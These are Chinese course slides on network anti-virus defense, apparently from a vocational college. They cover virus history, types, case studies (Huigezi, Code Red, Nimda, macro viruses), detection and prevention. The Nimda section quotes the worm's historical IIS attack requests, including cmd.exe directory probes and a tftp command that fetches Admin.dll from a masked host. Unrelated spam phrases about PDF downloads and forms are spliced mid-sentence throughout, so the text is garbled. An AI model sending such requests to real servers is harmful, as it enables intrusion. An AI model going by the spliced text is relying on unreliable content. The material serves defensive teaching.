chapter3 网络防病毒

null第三章 网络防病毒第三章 网络防病毒深职院 计算机网络技术专业 池瑞楠 本章主要 内容 财务内部控制制度的内容财务内部控制制度的内容人员招聘与配置的内容项目成本控制的内容消防安全演练内容 Key Questions本章主要内容 Key Questions计算机病毒的定义 病毒发展史 计算机病毒的特点 病毒分类 计算机病毒的发展趋势 病毒实例 病毒的防护 网络安全防护体系构架网络安全防护体系构架网络安全防护体系构架网络安全评估安全防护网络安全服务系统漏洞扫描网络管理评估病毒防护体系网络监控数据保密网络访问控制应急服务体系安全技术培训数据恢复一、计算机病毒的定义一、计算机病毒的定义 1994年2月18日，我国正式颁布实施了《中华人民共和国计算机信息系统安全保护条例》，在《条例》第二十八条中明确指出：“计算机病毒，指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制 的一组计算机指令或者程序代码 ”。 病毒：Virus 二、计算机病毒的发展史二、计算机病毒的发展史1、计算机病毒的产生的思想基础和病毒发展简介 2、实验室中产生——病毒的祖先（磁芯大战） 3、计算机病毒的出现（1983年） 4、我国计算机病毒的出现 （1989年） 病毒的产生原因病毒的产生原因（1）编制人员出于一种炫耀和显示自己能力的目的 （2）某些软件作者出于版权保护的目的而编制 （3）出于某种报复目的或恶作剧而编写病毒 （4）出于政治、战争的需要 计算机病毒的发展历程计算机病毒的发展历程1. DOS引导阶段 2. DOS可执行阶段 3. 伴随阶段 4. 多形阶段 5. 生成器、变体机阶段 6. 网络、蠕虫阶段 7. 视窗阶段 8. 宏病毒阶段 9. 邮件病毒阶段 10. 手持移动设备病毒阶段 典型的计算机病毒事件典型的计算机病毒事件null2006年十大病毒2006年十大病毒2006年出现的新病毒数量急剧增加，达到234211个，几乎等于以往所有病毒数量的总和。 这些新病毒，90%以上带有明显的利益特征，有窃取个人资料、各种账号密码等行为。其中，窃取用户账号密码等个人虚拟财产信息的病毒共167387个，占到总病毒数量的71.47%。这一年，中国还出现了首个勒索病毒“进程杀手变种”。2006年十大病毒2006年十大病毒近年新增病毒数量对比近年新增病毒数量对比2007年各类病毒/木马比例2007年各类病毒/木马比例2007年十大病毒/木马2007年十大病毒/木马数据来源：金山软件发布的《2007年度中国电脑病毒疫情及互联网安全报告》（2008/1/17）2008年上半年病毒数量2008年上半年病毒数量2008年度上半年十大病毒排行 ——FROM：江民科技 2008年度上半年十大病毒排行 ——FROM：江民科技 2008年上半年病毒种类分析2008年上半年病毒种类分析计算机病毒的危害计算机病毒的危害1、计算机病毒造成巨大的社会经济损失 2、影响政府职能部门正常工作的开展 3、计算机病毒被赋予越来越多的政治意义 4、利用计算机病毒犯罪现象越来越严重 病毒带来的威胁病毒带来的威胁 三、计算机病毒的特征三、计算机病毒的特征传染性 破坏性 潜伏性和可触发性 非授权性 隐藏性 不可预见性病毒名：Backdoor/Huigezi.2005（灰鸽子2005） 病毒名：Backdoor/Huigezi.2005（灰鸽子2005）     1.病毒运行后，将创建下列文件(安全模式下查看)：     %WinDir%IExplorer.exe，病毒程序     %WinDir%IExplorer.dll, 病毒程序     %WinDir%IExplorer_Hook.dll, 病毒程序  nullnull2.通过修改如下注册 表 关于同志近三年现实表现材料材料类招标技术评分表图表与交易pdf视力表打印pdf用图表说话 pdf 项，将病毒自身添加为服务     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Power supply management] 3.将IExplorer_Hook.dll注入到系统每个进程中，通过hook系统函数来达到隐藏自身的目的。 (1)隐藏病毒自身进程，通过任务管理器无法查找到病毒进程。 (2)隐藏病毒自身文件，正常模式下查看不到病毒文件。 (3)隐藏自身添加的服务，使自己从服务列表中消失。  四、计算机病毒有哪些种类？四、计算机病毒有哪些种类？依据不同的分类 标准 excel标准偏差excel标准偏差函数exl标准差函数国标检验抽样标准表免费下载红头文件格式标准下载 ，计算机病毒可以做不同的归类。常见的分类标准有： 1. 根据病毒依附的操作系统 2. 根据病毒的传播媒介 3. 根据病毒的传染途径病毒攻击的操作系统病毒攻击的操作系统Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系统 病毒的传播媒介病毒的传播媒介存储介质 网络 邮件(SoBig) 网页(RedLof) 局域网(Funlove) 远程攻击(Blaster) 网络下载病毒的传播和感染对象病毒的传播和感染对象感染引导区 感染文件 可执行文件 OFFICE宏 网页脚本（ Java小程序和ActiveX控件） 网络蠕虫 网络木马 破坏程序 其他恶意程序病毒演示病毒演示null病毒演示—CIH病毒病毒演示—彩带病毒病毒演示—彩带病毒病毒演示—女鬼病毒病毒演示—女鬼病毒病毒演示—千年老妖病毒演示—千年老妖病毒演示—圣诞节病毒病毒演示—圣诞节病毒病毒演示—白雪公主病毒演示—白雪公主巨大的黑白螺旋占据了屏幕位置，使计算机使用者无法进行任何操作！红色代码红色代码198.137.240.91(www.whitehouse.gov) 病毒发作现象病毒发作现象AIDS 幻彩 救护车Happy99 Ketapang Kmpsd引导型病毒 引导型病毒 文件型病毒 文件型病毒 文件型病毒的特点是附着于正常程序文件，成为程序文件的一个外壳或部件。 文件型病毒主要以感染文件扩展名为.com、.exe和.bat等可执行程序为主。 大多数的文件型病毒都会把它们自己的代码复制到其宿主文件的开头或结尾处。 计算机病毒引起是异常情况计算机病毒引起是异常情况计算机系统运行速度明显降低 系统容易死机 文件改变、破坏 磁盘空间迅速减少 内存不足 系统异常频繁重启动 频繁产生错误信息　常见DOS病毒分析　常见DOS病毒分析1．引导记录病毒 （1）引导型病毒的传播、破坏过程 （2）引导型病毒实例：小球病毒 2．文件型病毒 （1）文件型病毒的类型 （2）文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染 宏病毒的行为和特征宏病毒的行为和特征 宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。可以在Windows、Windows 95/98/NT、OS/2、Macintosh 等操作系统上执行病毒行为。 宏病毒的主要特征如下： 1）宏病毒会感染.DOC文档和.DOT模板文件。 2）宏病毒的传染通常是Word在打开一个带宏病毒的文档或模板时，激活宏病毒。 null3）多数宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自动宏，通过这些自动宏病毒取得文档（模板）操作权。 4）宏病毒中总是含有对文档读写操作的宏命令。 5）宏病毒在.DOC文档、.DOT模板中以BFF（Binary File Format）格式存放，这是一种加密压缩格式，每个Word版本格式可能不兼容。 6）宏病毒具有兼容性。 宏病毒的特点宏病毒的特点1．传播极快 2．制作、变种方便 3．破坏可能性极大宏病毒的防治和清除 方法 快递客服问题件处理详细方法山木方法pdf计算方法pdf华与华方法下载八字理论方法下载 宏病毒的防治和清除方法Word宏病毒，是近年来被人们谈论得最多的一种计算机病毒。与那些用复杂的计算机编程语言编制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病毒的编制、发作过程之后，即使是普通的计算机用户，不借助任何杀毒软件，就可以较好地对其进行防冶。 null1. 查看“可疑”的宏 2．按使用习惯编制宏 3．防备Autoxxxx宏 4．小心使用外来的Word文档 5．使用选项“Prompt to Save Normal Template” （工具-选项-保存） 6．查看宏代码并删除 7. 将文档存储为RTF格式 8．设置Normal.dot的只读属性 9． Normal.dot的密码保护 10．使用OFFICE 的报警设置 网络化病毒的特点网络化病毒的特点网络化：传播速度快、爆发速度快、面广 隐蔽化：具有欺骗性（加密） 多平台、多种语言 新方式：与黑客、特洛伊木马相结合 多途径： 攻击反病毒软件 变化快（变种） 清除难度大 破坏性强 蠕虫病毒蠕虫病毒通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征，如不利用文件寄生（有的只存在于内存中）,对网络造成拒绝服务，以及和黑客技术相结合等等。蠕虫病毒与其他病毒的区别蠕虫病毒与其他病毒的区别蠕虫病毒的特点蠕虫病毒的特点破坏性强 传染方式多 一种是针对企业的局域网，主要通过系统漏洞；另外一种是针对个人用户的, 主要通过电子邮件,恶意网页形式迅速传播的蠕虫病毒。 传播速度快 清除难度大实例：2003蠕虫王实例：2003蠕虫王 病毒实例——Nimda及解决 方案 气瓶 现场处置方案 .pdf气瓶 现场处置方案 .doc见习基地管理方案.doc关于群访事件的化解方案建筑工地扬尘治理专项方案下载 病毒实例——Nimda及解决方案感染 Win 95/98/NT/2000 系统 1.通过email 在internet临时文件夹中读取所有"htm"，"html"文件并从中提取email地址， 从信箱读取email并从中提取SMTP服务器，然后发送readme.eml。Nimda--2.利用 IIS、IE 的安全漏洞Nimda--2.利用 IIS、IE 的安全漏洞 CodeRedII会在IIS的几个可执行目录下放置root.exe Nimda首先在udp/69上启动一个tftp服务器然后会作以下扫描： GET /scripts/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 …… 一旦发现有弱点的系统就使用类似下面的命令 GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0 把文件传到主机上去，然后再 GET /scripts/Admin.dll HTTP/1.0Nimda-- 3.通过WWW服务Nimda-- 3.通过WWW服务在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml，并在文件末加上下面这一行 也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。 Nimda-- 4.通过局域网的共享Nimda-- 4.通过局域网的共享Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20.dll 病毒实例——Nimda及解决方案病毒实例——Nimda及解决方案首先对网络中的工作站进行全面清查对已感染的工作站进行彻底的杀毒，然后对已染毒的服务器杀毒以保证整个网络系统是干净的； 对网络中的服务器及工作站进行软件升级等一系列后续工程，杜绝再次染毒 打微软IIS、IE的补丁 最后着重对服务器进行本地安全策略的设置，做好防范工作，做到即使服务器再次中毒也不能影响整个服务器的正常工作及整个网络系统的正常运转。反病毒技术简述反病毒技术简述计算机病毒诊断技术 1． 特征代码法 2．校验和法 3．行为监测法 4．软件模拟法 五、病毒的预防措施五、病毒的预防措施安装防病毒软件 定期升级防病毒软件 不随便打开不明来源 的邮件附件 尽量减少其他人使用你的计算机 及时打系统补丁 从外面获取数据先检察 建立系统恢复盘 定期备份文件 综合各种防病毒技术全方位的网络病毒防护体系全方位的网络病毒防护体系网关级防毒企业內部网络STOP!服务器端防毒客户端防毒防毒集中管理器STOP!STOP!Mail ServerSTOP!STOP!Meb Server File ServerSTOP!网络病毒的特点及传播方式网络病毒的特点及传播方式传播速度快 扩散面广 难于彻底清除 传播的形式复杂多样 破坏性大网络病毒的特点 网络病毒的传播方式 单机版与网络版的区别单机版与网络版的区别全网统一配置防毒策略。 全网统一查杀病毒,没有死角。 全网统一升级版本统一。 全网防毒状况一目了然。 跨平台技术，全方位防病毒 全网防毒工作轻松简单：自动安装、自动维护、自动更新单机防毒网络防毒选择防毒软件的标准选择防毒软件的标准“高侦测率”是基本条件， “尽量小影响”是基本要求， “容易管理”是基本要求， 未知病毒“隔离政策”是关键。病毒处理功能特色指标（高侦测率）病毒处理功能特色指标（高侦测率）未知病毒检测能力、未知病毒清除能力 压缩文件查毒（不限层数）、压缩文件清毒（不限层数） 打包文件查毒（不限层数）、打包文件清毒（不限层数） 内存查毒、内存清毒、运行文件清毒 null邮件接收检测、邮件发送检测 邮件文件静态检测、邮件文件清毒 邮箱静态检测、邮箱静态清毒 举例：SQL Slammer 病毒每 8.5 秒就会使 SQL服务器感染数成倍增长。如果只有高侦测率，无法在病毒入侵前的第一时间，自动部署安全策略六、常用的防病毒软件六、常用的防病毒软件Kv3000 瑞星：Rishing NAI公司： McAfee TVD TrendMicro（趋势科技）： Symantec公司：Norton AntiVirus著名杀毒软件公司的站点地址著名杀毒软件公司的站点地址网络防病毒作业网络防病毒作业参考题目： 机器狗病毒（2008年，木马） 磁碟机病毒 / “千足虫”病毒（2008年，蠕虫） AUTO病毒 / U盘病毒（2007年，蠕虫+文件） 熊猫烧香（2006年，蠕虫＋木马） 冲击波（2003年，蠕虫＋缓冲区溢出） CIH病毒（1999年，文件类+破坏硬件） ARP病毒（2007年） 威金蠕虫（2006年）网络防病毒作业（续）网络防病毒作业（续）要求： 社会背景，经济损失 现象 原理 传播途径 传播机制 破坏机制 清除方法（自动 / 手动） 项目组人员分工情况